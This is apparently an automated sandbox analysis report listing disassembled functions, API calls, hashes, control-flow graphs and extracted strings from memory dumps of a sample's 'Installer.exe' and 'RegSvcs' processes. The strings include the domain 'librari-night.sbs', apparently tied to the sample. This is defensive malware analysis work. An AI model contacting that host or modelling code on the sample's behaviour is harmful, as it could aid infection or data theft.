                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 167067550-0
                                                                                                                                        • Opcode ID: 1eb5e8ebd13789cdd7f6806db82f450de017684375b1a17d41b598a2dcfe973c
                                                                                                                                        • Instruction ID: 80db877a8b068bae8fd21541588414a1ba3bc7a5373741cd95847f5bc8c4bd53
                                                                                                                                        • Opcode Fuzzy Hash: 1eb5e8ebd13789cdd7f6806db82f450de017684375b1a17d41b598a2dcfe973c
                                                                                                                                        • Instruction Fuzzy Hash: EF212871624206EFDB10AF629C85D2BB7ACFF413667108615FC19D3540D771ECA8CBA8
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00254DB8,?,?,?,?,00254E73,?,?,?), ref: 00258CDF
                                                                                                                                        • _free.LIBCMT ref: 00258D3C
                                                                                                                                        • _free.LIBCMT ref: 00258D72
                                                                                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,?,?,00254E73,?,?,?), ref: 00258D7D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2283115069-0
                                                                                                                                        • Opcode ID: f2afb08e1aa9c00dfac182456cc13dab1b23f657d3c51bad34ac4df24eb7f9cd
                                                                                                                                        • Instruction ID: 2c42074aefd06299cdac8c5b5ce5106fe4fefc5a89672d630a4e884fc7e16755
                                                                                                                                        • Opcode Fuzzy Hash: f2afb08e1aa9c00dfac182456cc13dab1b23f657d3c51bad34ac4df24eb7f9cd
                                                                                                                                        • Instruction Fuzzy Hash: 59112C322751026ACA5036757C49F3721E9DBD1777B340224FE18A20D2EEF08C3C451C
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,002578C0,002583C3,00269C50,?,00251D51,?,?,00251093,0000077E), ref: 00258E36
                                                                                                                                        • _free.LIBCMT ref: 00258E93
                                                                                                                                        • _free.LIBCMT ref: 00258EC9
                                                                                                                                        • SetLastError.KERNEL32(00000000,00000006,000000FF,?,002578C0,002583C3,00269C50,?,00251D51,?,?,00251093,0000077E), ref: 00258ED4
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2283115069-0
                                                                                                                                        • Opcode ID: a4d9197da01d4710be713bda1a5139bca9b59b226ef9d3e46267e64eb5968450
                                                                                                                                        • Instruction ID: 0603e736a55e661833eed94d63ae84ccf1a355a50dd9e14053e6ab34cb7f2e7a
                                                                                                                                        • Opcode Fuzzy Hash: a4d9197da01d4710be713bda1a5139bca9b59b226ef9d3e46267e64eb5968450
                                                                                                                                        • Instruction Fuzzy Hash: 771100316742022ADB513A757C4BE3B22A99BC1B77B340624FE1CA21D2EEF18C3C5518
                                                                                                                                        APIs
                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,002609C7,00000000,00000001,00000000,00000000,?,0025CFEA,?,?,00000000), ref: 00261589
                                                                                                                                        • GetLastError.KERNEL32(?,002609C7,00000000,00000001,00000000,00000000,?,0025CFEA,?,?,00000000,?,00000000,?,0025D536,?), ref: 00261595
                                                                                                                                          • Part of subcall function 0026155B: CloseHandle.KERNEL32(FFFFFFFE,002615A5,?,002609C7,00000000,00000001,00000000,00000000,?,0025CFEA,?,?,00000000,?,00000000), ref: 0026156B
                                                                                                                                        • ___initconout.LIBCMT ref: 002615A5
                                                                                                                                          • Part of subcall function 0026151D: CreateFileW.KERNEL32(CONOUT$,40000000,00000003,00000000,00000003,00000000,00000000,0026154C,002609B4,00000000,?,0025CFEA,?,?,00000000,?), ref: 00261530
                                                                                                                                        • WriteConsoleW.KERNEL32(00000000,00000000,00000000,00000000,?,002609C7,00000000,00000001,00000000,00000000,?,0025CFEA,?,?,00000000,?), ref: 002615BA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2744216297-0
                                                                                                                                        • Opcode ID: dfef0d4d05fa4a505d94998227b9b07f5c413efee08ddfa43eae15f1b49ab16b
                                                                                                                                        • Instruction ID: e44306a56937eef272de0dd464a74e7b021db4a37a31e3048826eb9a59a3fd60
                                                                                                                                        • Opcode Fuzzy Hash: dfef0d4d05fa4a505d94998227b9b07f5c413efee08ddfa43eae15f1b49ab16b
                                                                                                                                        • Instruction Fuzzy Hash: 2EF01C36510125BBCF263FA5EC0C9AA7FA6EB483B1B458114FA4A86120C77298B09F90
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00257289
                                                                                                                                          • Part of subcall function 0025792B: HeapFree.KERNEL32(00000000,00000000,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093), ref: 00257941
                                                                                                                                          • Part of subcall function 0025792B: GetLastError.KERNEL32(00251093,?,0025B994,00251093,00000000,00251093,?,?,0025B9BB,00251093,00000007,00251093,?,0025BDE1,00251093,00251093), ref: 00257953
                                                                                                                                        • _free.LIBCMT ref: 0025729C
                                                                                                                                        • _free.LIBCMT ref: 002572AD
                                                                                                                                        • _free.LIBCMT ref: 002572BE
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: bf798fba04749542b8a38d372ba91cb98644d3eb08b4c763d747774b3e1d624f
                                                                                                                                        • Instruction ID: faa0c9bb5b3dd7978967fccc8aa1f5004a4e8430355e18d9834290ed0264d62b
                                                                                                                                        • Opcode Fuzzy Hash: bf798fba04749542b8a38d372ba91cb98644d3eb08b4c763d747774b3e1d624f
                                                                                                                                        • Instruction Fuzzy Hash: C6E08C72E24120DAC7027F22FC2986A3EA6E76CB003208407FC4002273D7B28462AFDC
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0025A88F: GetOEMCP.KERNEL32(00000000,0025AB00,00000000,sN%,?,?,00254E73,?), ref: 0025A8BA
                                                                                                                                        • IsValidCodePage.KERNEL32(-00000030,00000000,00251128,?,?,sN%,0025AB47,00000000,00000000,?,00251128,?), ref: 0025AD52
                                                                                                                                        • GetCPInfo.KERNEL32(00000000,0025AB47,?,sN%,0025AB47,00000000,00000000,?,00251128,?,?,?,?,?,00254E73,?), ref: 0025AD94
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CodeInfoPageValid
                                                                                                                                        • String ID: sN%
                                                                                                                                        • API String ID: 546120528-2349382103
                                                                                                                                        • Opcode ID: f46a9a728f97bd0555658e8524e06c9128cd0a5d1528ce8ebbe2fc21b995a77b
                                                                                                                                        • Instruction ID: 4ea6ba38ab151f9a2bfbe7f964f78354c49f92668f85fb4ed9281bfe90c9e5a8
                                                                                                                                        • Opcode Fuzzy Hash: f46a9a728f97bd0555658e8524e06c9128cd0a5d1528ce8ebbe2fc21b995a77b
                                                                                                                                        • Instruction Fuzzy Hash: 885189709203468EDB20DF31C8436BBFBF5EF40302F14826ED88287251E774991ACB8A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\main\Installer.exe
                                                                                                                                        • API String ID: 0-2101772373
                                                                                                                                        • Opcode ID: 6a0fefb47518f717e58825a84614ebc6730167685f1d18e998329dc316a1a0ff
                                                                                                                                        • Instruction ID: e45e152ad26617673c047ae9d087d15b1f954c4f1921258f3b494576d750a6c7
                                                                                                                                        • Opcode Fuzzy Hash: 6a0fefb47518f717e58825a84614ebc6730167685f1d18e998329dc316a1a0ff
                                                                                                                                        • Instruction Fuzzy Hash: AA41F571A20205EFCB21EF99DC899AFBBB8EF84711F544066FC04A7210D7B08E58CB64
                                                                                                                                        APIs
                                                                                                                                        • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 0025379A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: EncodePointer
                                                                                                                                        • String ID: MOC$RCC
                                                                                                                                        • API String ID: 2118026453-2084237596
                                                                                                                                        • Opcode ID: 67a8e72a8d3ddd54ffa824834b7754f2772f1c818a55349aab5b7efbb6d9d529
                                                                                                                                        • Instruction ID: 896efb2e31c81746c0b4a4f1a954bec5654d89c82b73120410a0726f35d0d6d0
                                                                                                                                        • Opcode Fuzzy Hash: 67a8e72a8d3ddd54ffa824834b7754f2772f1c818a55349aab5b7efbb6d9d529
                                                                                                                                        • Instruction Fuzzy Hash: 1A41897190020AEFCF1ACF98CC85AAEBBB5FF48351F188059FD0466251D3359A64CB54
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0025A88F: GetOEMCP.KERNEL32(00000000,0025AB00,00000000,sN%,?,?,00254E73,?), ref: 0025A8BA
                                                                                                                                        • _free.LIBCMT ref: 0025AB5D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free
                                                                                                                                        • String ID: sN%
                                                                                                                                        • API String ID: 269201875-2349382103
                                                                                                                                        • Opcode ID: e9580b75154cf614e4ed42b21af7a822979156656533adb1337cb53a2122f83e
                                                                                                                                        • Instruction ID: a40d48bf7d1939da1249385e4ecfa4a9cf785be94aa31c96e07d67a3b489d763
                                                                                                                                        • Opcode Fuzzy Hash: e9580b75154cf614e4ed42b21af7a822979156656533adb1337cb53a2122f83e
                                                                                                                                        • Instruction Fuzzy Hash: 9D31D07191020AAFCB01EF58D841AAE77F6FF44325F14026AFC10AB291EB319D65CFA5
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0025B6AC: EnterCriticalSection.KERNEL32(00000000,?,0025D3F2,00000000,0026AFA0,00000010,002580D1,00000000,?,00000000,00000000,?,?,00259C04,?), ref: 0025B6C7
                                                                                                                                        • FlushFileBuffers.KERNEL32(00000000,0026AF80,0000000C,0025CBFB,0025802E,00000001,?,?,0025802E,00000001,)s%,?,00257329), ref: 0025CB3D
                                                                                                                                        • GetLastError.KERNEL32 ref: 0025CB4E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffersCriticalEnterErrorFileFlushLastSection
                                                                                                                                        • String ID: )s%
                                                                                                                                        • API String ID: 4109680722-2278251023
                                                                                                                                        • Opcode ID: eb48c4db2424f622d72977b09ddec19d98099f5168e0f337c62c8681907e5556
                                                                                                                                        • Instruction ID: 96a07dcaaf64829549ddf562b7cb80d6e585564635c118f7ee4de0f9213bcd3c
                                                                                                                                        • Opcode Fuzzy Hash: eb48c4db2424f622d72977b09ddec19d98099f5168e0f337c62c8681907e5556
                                                                                                                                        • Instruction Fuzzy Hash: 0801D272A20300CFC714EFA8E80AA5D7BA4EB49721F24424AF8119B3E1D7B49855CF98
                                                                                                                                        APIs
                                                                                                                                        • GetOEMCP.KERNEL32(00000000,0025AB00,00000000,sN%,?,?,00254E73,?), ref: 0025A8BA
                                                                                                                                        • GetACP.KERNEL32(00000000,0025AB00,00000000,sN%,?,?,00254E73,?), ref: 0025A8D1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000B.00000002.2122530937.0000000000251000.00000020.00000001.01000000.00000007.sdmp, Offset: 00250000, based on PE: true
                                                                                                                                        • Associated: 0000000B.00000002.2122505527.0000000000250000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122559402.0000000000264000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.000000000026C000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122581951.00000000003AA000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        • Associated: 0000000B.00000002.2122718389.00000000004E9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_11_2_250000_Installer.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: sN%
                                                                                                                                        • API String ID: 0-2349382103
                                                                                                                                        • Opcode ID: b84cd4cba11e7d41c5bc7b387648d6d46d69187c7227933338d45eb88b85ad75
                                                                                                                                        • Instruction ID: 25c5bc9d7407eb3a6179f5fac4c76bf820bf142a866f05918be94d80735637fa
                                                                                                                                        • Opcode Fuzzy Hash: b84cd4cba11e7d41c5bc7b387648d6d46d69187c7227933338d45eb88b85ad75
                                                                                                                                        • Instruction Fuzzy Hash: F8F06230D30185DBD714EF68E84D7687770AB0033AF208344E9258B1E1CBF1AC99DB56

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 112 424800-42485f 113 424860-4248ad 112->113 113->113 114 4248af-4248ff 113->114 116 424900-424942 114->116 116->116 117 424944-42494c 116->117 118 424962-424969 117->118 119 424953-424959 117->119 120 424970 117->120 118->120 121 424972 119->121 122 42495b-424960 119->122 120->121 123 424979-42499b call 4086e0 121->123 122->123 127 4249a2-4249a4 123->127 128 4249bc-4249cd 123->128 129 4249ac-424ede call 4086f0 123->129 127->129 130 4249d6 128->130 131 4249cf-4249d4 128->131 133 4249d8-424a1a call 4086e0 130->133 131->133 138 424a20-424a33 133->138 138->138 139 424a35-424a3d 138->139 140 424a61-424a6d 139->140 141 424a3f-424a44 139->141 143 424a91-424a9c call 440ba0 140->143 144 424a6f-424a73 140->144 142 424a50-424a5f 141->142 142->140 142->142 147 424aa1-424aad 143->147 145 424a80-424a8f 144->145 145->143 145->145 148 424c50-424c56 call 4086f0 147->148 149 424e86 147->149 150 424ac4-424acd 147->150 151 424ab4-424abb 147->151 152 424d54-424d7f 147->152 153 424c4a 147->153 154 424c38-424c42 147->154 155 424c5f-424d13 147->155 148->155 157 424ad6 150->157 158 424acf-424ad4 150->158 151->150 156 424d80-424d9c 152->156 154->153 160 424d20-424d32 155->160 156->156 161 424d9e-424e35 156->161 162 424add-424b88 call 4086e0 157->162 158->162 160->160 164 424d34-424d4c call 422ba0 160->164 165 424e40-424e59 161->165 172 424b90-424bb0 162->172 164->152 165->165 168 424e5b-424e7e call 4229d0 165->168 168->149 172->172 174 424bb2-424bba 172->174 175 424be1-424bed 174->175 176 424bbc-424bc3 174->176 178 424c11-424c31 GetLogicalDrives call 440ba0 175->178 179 424bef-424bf3 175->179 177 424bd0-424bdf 176->177 177->175 177->177 178->148 178->149 178->152 178->153 178->154 181 424c00-424c0f 179->181 181->178 181->181
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2318663887.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000C.00000002.2318642874.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318700801.0000000000442000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318718813.0000000000445000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318738423.0000000000456000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_RegSvcs.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: 8I>O$;IJK$;M|C$<=$@A$C1D7$C5+K$H=K3$V%C;$]!S'$_-_#$_9_?$YW
                                                                                                                                        • API String ID: 0-1278073768
                                                                                                                                        • Opcode ID: 9d6e3cad78538977bec747fe82c6f9a8860d9c34d9b0a4049a0e0a040e7e813f
                                                                                                                                        • Instruction ID: 48240a3c797665121a6c8427249b37c171d795af1c4e3dc191a1b5d2d7455386
                                                                                                                                        • Opcode Fuzzy Hash: 9d6e3cad78538977bec747fe82c6f9a8860d9c34d9b0a4049a0e0a040e7e813f
                                                                                                                                        • Instruction Fuzzy Hash: FBF1DCB160C3508FD300DF25E89166BBBE0EFC6354F45892DE9D58B391E7788909CB8A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 356 40dcb7-40dcf6 call 433e90 call 409dc0 CoUninitialize 361 40dd00-40dd19 356->361 361->361 362 40dd1b-40dd3b 361->362 363 40dd40-40dd64 362->363 363->363 364 40dd66-40dddf 363->364 365 40dde0-40ddfd 364->365 365->365 366 40ddff-40de10 365->366 367 40de12-40de19 366->367 368 40de2b-40de33 366->368 369 40de20-40de29 367->369 370 40de35-40de36 368->370 371 40de4b-40de58 368->371 369->368 369->369 374 40de40-40de49 370->374 372 40de5a-40de61 371->372 373 40de7b-40de87 371->373 375 40de70-40de79 372->375 376 40de89-40de8a 373->376 377 40de9b-40dea5 373->377 374->371 374->374 375->373 375->375 378 40de90-40de99 376->378 379 40dea7-40deab 377->379 380 40debb-40dec7 377->380 378->377 378->378 381 40deb0-40deb9 379->381 382 40dee1-40e025 380->382 383 40dec9-40decb 380->383 381->380 381->381 385 40e030-40e07b 382->385 384 40ded0-40dedd 383->384 384->384 386 40dedf 384->386 385->385 387 40e07d-40e0a8 385->387 386->382 388 40e0b0-40e0d5 387->388 388->388 389 40e0d7-40e123 call 40bdb0 388->389
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00433E90: GetSystemMetrics.USER32 ref: 00433ED9
                                                                                                                                          • Part of subcall function 00433E90: GetSystemMetrics.USER32 ref: 00433EE9
                                                                                                                                        • CoUninitialize.COMBASE ref: 0040DCCC
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2318663887.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000C.00000002.2318642874.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318700801.0000000000442000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318718813.0000000000445000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318738423.0000000000456000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_RegSvcs.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MetricsSystem$Uninitialize
                                                                                                                                        • String ID: $#$@KFQ$librari-night.sbs$_Q
                                                                                                                                        • API String ID: 1128523136-3728625778
                                                                                                                                        • Opcode ID: d23d948b592791f3cfd090ade1304dc5fd674626a75ff97414607907e0f1a076
                                                                                                                                        • Instruction ID: 4defda7e57fa942cb74b608a607347f298506896ac3dbf0eddcd85f7108a5fce
                                                                                                                                        • Opcode Fuzzy Hash: d23d948b592791f3cfd090ade1304dc5fd674626a75ff97414607907e0f1a076
                                                                                                                                        • Instruction Fuzzy Hash: 5EB1BC7550D3C28BD3358F25C4907EBBBE1AFE6304F08996DD0C95B382D778490A8B9A

                                                                                                                                        Control-flow Graph

                                                                                                                                        • Executed
                                                                                                                                        • Not Executed
                                                                                                                                        control_flow_graph 414 40bdb0-40c00f 415 40c010-40c02c 414->415 415->415 416 40c02e-40c03a 415->416 417 40c03d-40c061 416->417
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 0000000C.00000002.2318663887.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 0000000C.00000002.2318642874.0000000000400000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318700801.0000000000442000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318718813.0000000000445000.00000004.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        • Associated: 0000000C.00000002.2318738423.0000000000456000.00000002.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_12_2_400000_RegSvcs.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: AK$J's)$m?i!$u#{%$~+*-$[:]
